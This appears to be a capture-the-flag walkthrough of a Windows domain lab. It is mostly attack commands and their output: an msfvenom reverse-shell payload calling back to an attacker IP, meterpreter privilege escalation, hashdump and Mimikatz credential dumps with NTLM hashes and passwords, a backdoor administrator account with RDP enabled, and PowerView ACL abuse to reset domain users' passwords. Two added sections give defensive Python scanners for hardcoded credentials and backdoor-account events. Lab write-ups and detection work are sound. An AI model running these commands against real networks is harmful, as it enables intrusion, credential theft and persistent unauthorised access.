Initial exploitation

Got the meterpreter shell

meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).

Getting a new meterpreter shell without sqlmap

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.108 LPORT=4447 -f exe > prompt.exe

meterpreter > upload prompt.exe

.\prompt.exe
exit

On the new meterpreter shell

Got access to SQL01

getsystem
migrate
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
justalocaladmin:1002:aad3b435b51404eeaad3b435b51404ee:52cf26fe133b543d3dc733d37ef1024b:::

Uploading Mimikatz and dumping the logon passwords

mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 110389 (00000000:0001af35)
Session           : Service from 0
User Name         : MSSQL$SQLEXPRESS
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 4/26/2023 10:30:09 PM
SID               : S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133
        msv :
         [00000003] Primary
         * Username : SQL01$
         * Domain   : CORP
         * NTLM     : b40dae2bd88b86bf78ea95ba80f95f33
         * SHA1     : b3251c1ffe7ed34407c29fc38ee1c91eba155694
        tspkg :
        wdigest :
         * Username : SQL01$
         * Domain   : CORP
         * Password : (null)
        kerberos :
         * Username : SQL01$
         * Domain   : CORP.LOCAL
         * Password : (null)
        ssp :
        credman :
 
Authentication Id : 0 ; 66693 (00000000:00010485)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 4/26/2023 10:30:06 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : SQL01$
         * Domain   : CORP
         * NTLM     : b40dae2bd88b86bf78ea95ba80f95f33
         * SHA1     : b3251c1ffe7ed34407c29fc38ee1c91eba155694
        tspkg :
        wdigest :
         * Username : SQL01$
         * Domain   : CORP
         * Password : (null)
        kerberos :
         * Username : SQL01$
         * Domain   : corp.local
         * Password : `\Zqw(<K!xPD'EYp7pU:7%o/jsklO1v*<u,a+b)\kyh?2Vs(5XV/eu\Km;5MNxUw!k@I-mQa$.Q.o<80XA4N7#rX4+Tj\v-MhKM453zBa$G0*oq-W8yD=Pna
        ssp :
        credman :
 
Authentication Id : 0 ; 66470 (00000000:000103a6)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 4/26/2023 10:30:06 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : SQL01$
         * Domain   : CORP
         * NTLM     : b40dae2bd88b86bf78ea95ba80f95f33
         * SHA1     : b3251c1ffe7ed34407c29fc38ee1c91eba155694
        tspkg :
        wdigest :
         * Username : SQL01$
         * Domain   : CORP
         * Password : (null)
        kerberos :
         * Username : SQL01$
         * Domain   : corp.local
         * Password : `\Zqw(<K!xPD'EYp7pU:7%o/jsklO1v*<u,a+b)\kyh?2Vs(5XV/eu\Km;5MNxUw!k@I-mQa$.Q.o<80XA4N7#rX4+Tj\v-MhKM453zBa$G0*oq-W8yD=Pna
        ssp :
        credman :
 
Authentication Id : 0 ; 35946 (00000000:00008c6a)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 4/26/2023 10:30:05 PM
SID               : 
        msv :
         [00000003] Primary
         * Username : SQL01$
         * Domain   : CORP
         * NTLM     : b40dae2bd88b86bf78ea95ba80f95f33
         * SHA1     : b3251c1ffe7ed34407c29fc38ee1c91eba155694
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
 
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SQL01$
Domain            : CORP
Logon Server      : (null)
Logon Time        : 4/26/2023 10:30:05 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : SQL01$
         * Domain   : CORP
         * Password : (null)
        kerberos :
         * Username : sql01$
         * Domain   : CORP.LOCAL
         * Password : (null)
        ssp :
        credman :
 
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SQL01$
Domain            : CORP
Logon Server      : (null)
Logon Time        : 4/26/2023 10:30:06 PM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : SQL01$
         * Domain   : CORP
         * NTLM     : b40dae2bd88b86bf78ea95ba80f95f33
         * SHA1     : b3251c1ffe7ed34407c29fc38ee1c91eba155694
        tspkg :
        wdigest :
         * Username : SQL01$
         * Domain   : CORP
         * Password : (null)
        kerberos :
         * Username : sql01$
         * Domain   : CORP.LOCAL
         * Password : (null)
        ssp :
        credman :
 
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 4/26/2023 10:30:06 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
 

Found a share.bat file which, after executing it, gave me access to Z: on FS01

OFFSHORE{sl0ppy_scr1pting_hurt$}
 
Users love to take shortcuts
 

Backup.ps1

PS Z:\> type backup.ps1
#set server location,credentials
$Server = "\\172.16.4.100"
$FullPath = "$Server\q1\backups"
$username = "pgibbons"
$password = "I l0ve going Fishing!"
0694311c666b622f590f1c1837422c5f
net use $Server $password /USER:$username  
try  
{
#copy the backup
Copy-Item $zipFileName $FullPath  
#remove all zips older than 1 month from the unc path
Get-ChildItem "$uncFullPath\*.zip" |? {$_.lastwritetime -le (Get-Date).AddMonths(-1)} |% {Remove-Item $_ -force }  
}
catch [System.Exception] {  
WriteToLog -msg "could not copy backup to remote server... $_.Exception.Message" -type Error  
}
finally {  
#cleanup
net use $Server /delete  
}
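The backup script above is the classic hardcoded-credential finding: a plaintext password assigned to a variable and passed to net use. As an added example (not part of the original write-up), here is a small Python scanner a defender can run over scripts stored on shares to flag those patterns; the script text embedded in it is a constructed sample modelled on backup.ps1, and the rule names are my own.

```python
import re
from typing import List, Tuple

# Constructed sample modelled on the backup.ps1 found on the Z: share (not the original file).
SAMPLE_SCRIPT = r'''
#set server location,credentials
$Server = "\\172.16.4.100"
$FullPath = "$Server\q1\backups"
$username = "pgibbons"
$password = "I l0ve going Fishing!"
net use $Server $password /USER:$username
Copy-Item $zipFileName $FullPath
net use $Server /delete
'''

# Each rule: (name, compiled regex). Case-insensitive, as PowerShell itself is.
RULES = [
    # a variable whose name suggests a secret, assigned a quoted literal
    ("plaintext-password-assignment",
     re.compile(r'\$\w*(?:pass|pwd|secret|cred)\w*\s*=\s*["\'][^"\']+["\']', re.I)),
    # net use mapping a share with an explicit /USER: switch
    ("net-use-with-credentials",
     re.compile(r'\bnet\s+use\b.*\s/user:', re.I)),
    # SecureString built from a plaintext literal in the script itself
    ("securestring-from-plaintext",
     re.compile(r'ConvertTo-SecureString\s+.*-AsPlainText', re.I)),
]


def find_hardcoded_credentials(script: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, rule_name, stripped_line) for every line matching a rule."""
    findings = []
    for lineno, line in enumerate(script.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # skip blank lines and comments
        for name, pattern in RULES:
            if pattern.search(stripped):
                findings.append((lineno, name, stripped))
    return findings


if __name__ == "__main__":
    for lineno, rule, text in find_hardcoded_credentials(SAMPLE_SCRIPT):
        print(f"line {lineno}: {rule}: {text}")
```

On the sample this reports the $password assignment and the net use line; the password assignment is the one that should have been a credential-manager lookup or a service account with a managed password.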

Adding a new user

Add a local user and put them in the local Administrators group


net user ipsec TryHarder.1234 /ADD

net localgroup Administrators ipsec /ADD

Add user to interesting groups:


net localgroup "Remote Desktop Users" ipsec /add

Enabling access for Remote Desktop Connection

PS C:\> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -value 0
PS C:\> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1
PS C:\> Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
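The three steps above (create a local account, add it to Administrators and Remote Desktop Users, flip fDenyTSConnections to 0) are a noisy persistence chain in the Windows Security log and Sysmon. As an added example (not from the original write-up), here is detection logic in Python that correlates those events per host within a time window; the event records are constructed samples with simplified field names, not real log output, and the event IDs used are the standard ones (4720 account created, 4732 member added to a local group, Sysmon 13 registry value set).

```python
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample events (not real logs) mirroring the steps in this section.
# 4720 = local account created, 4732 = member added to a security-enabled local group,
# Sysmon 13 = registry value set. Field names are simplified for the example.
EVENTS = [
    {"ts": "2023-04-26T22:40:01", "host": "SQL01", "id": 4720, "target": "ipsec", "subject": "SYSTEM"},
    {"ts": "2023-04-26T22:40:05", "host": "SQL01", "id": 4732, "group": "Administrators", "target": "ipsec", "subject": "SYSTEM"},
    {"ts": "2023-04-26T22:40:09", "host": "SQL01", "id": 4732, "group": "Remote Desktop Users", "target": "ipsec", "subject": "SYSTEM"},
    {"ts": "2023-04-26T22:41:30", "host": "SQL01", "id": 13, "subject": "SYSTEM",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "value": "DWORD (0x00000000)"},
    # benign: a helpdesk-created account that is never elevated
    {"ts": "2023-04-26T09:00:00", "host": "FS01", "id": 4720, "target": "svc_backup", "subject": "CORP\\helpdesk"},
]

WINDOW = timedelta(minutes=30)
PRIV_GROUPS = {"administrators", "remote desktop users"}


def detect_rdp_backdoor_accounts(events: List[Dict]) -> List[Dict]:
    """Alert when, on one host within WINDOW of a new local account (4720), that account is
    added to Administrators / Remote Desktop Users (4732) or RDP is enabled via the registry."""
    by_host: Dict[str, List[Dict]] = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(ev["host"], []).append(ev)
    alerts = []
    for host, evs in by_host.items():
        for created in (e for e in evs if e["id"] == 4720):
            t0 = datetime.fromisoformat(created["ts"])
            later = [e for e in evs if t0 <= datetime.fromisoformat(e["ts"]) <= t0 + WINDOW]
            groups = {e["group"].lower() for e in later
                      if e["id"] == 4732 and e.get("target") == created["target"]}
            rdp_enabled = any(e["id"] == 13
                              and e["key"].lower().endswith("fdenytsconnections")
                              and e["value"].endswith("0x00000000)") for e in later)
            hits = sorted(groups & PRIV_GROUPS)
            if hits or rdp_enabled:
                alerts.append({"host": host, "account": created["target"],
                               "groups": hits, "rdp_enabled": rdp_enabled,
                               "created_by": created["subject"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_backdoor_accounts(EVENTS):
        print(alert)
```

A subject of SYSTEM creating and elevating an account, as here after getsystem, is itself worth a higher severity than an administrator doing the same from an interactive session.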

RDP Connection

xfreerdp

proxychains xfreerdp /u:ipsec /v:172.16.1.15 /p:TryHarder.1234

Running PowerShell as pgibbons

 
Import-Module .\powerview.ps1
 
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
 
Set-DomainUserPassword -Identity salvador -AccountPassword $UserPassword
Set-DomainUserPassword -Identity blake -AccountPassword $UserPassword -Verbose

Running PowerShell as salvador

Import-Module .\powerview.ps1
net group "Security Engineers" salvador /add /domain
## restart the shell
Add-DomainObjectAcl -TargetIdentity cyber_adm -PrincipalIdentity salvador -Rights All
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity cyber_adm -AccountPassword $UserPassword

Getting the shell on WEB-WIN01

Post Exploitation

Alternate Method

 
proxychains evil-winrm -i 172.16.1.101 -u svc_iis -p 'Vintage!'
$SecPassword = ConvertTo-SecureString 'I l0ve going Fishing!' -AsPlainText -Force
 
$Cred = New-Object System.Management.Automation.PSCredential('CORP\pgibbons', $SecPassword)
 
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
 
Set-DomainUserPassword -Identity salvador -AccountPassword $UserPassword -Credential $Cred
 
 
$SecPasswords = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
 
$Creds = New-Object System.Management.Automation.PSCredential('CORP\salvador', $SecPasswords)
 
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
 
 
Add-DomainGroupMember -Identity 'Security Engineers' -Members 'salvador' -Credential $Creds -Verbose
 
Add-DomainObjectAcl -Credential $Creds -TargetIdentity cyber_adm -PrincipalIdentity salvador -Rights All
 
Set-DomainUserPassword -Identity cyber_adm -AccountPassword $UserPassword -Credential $Creds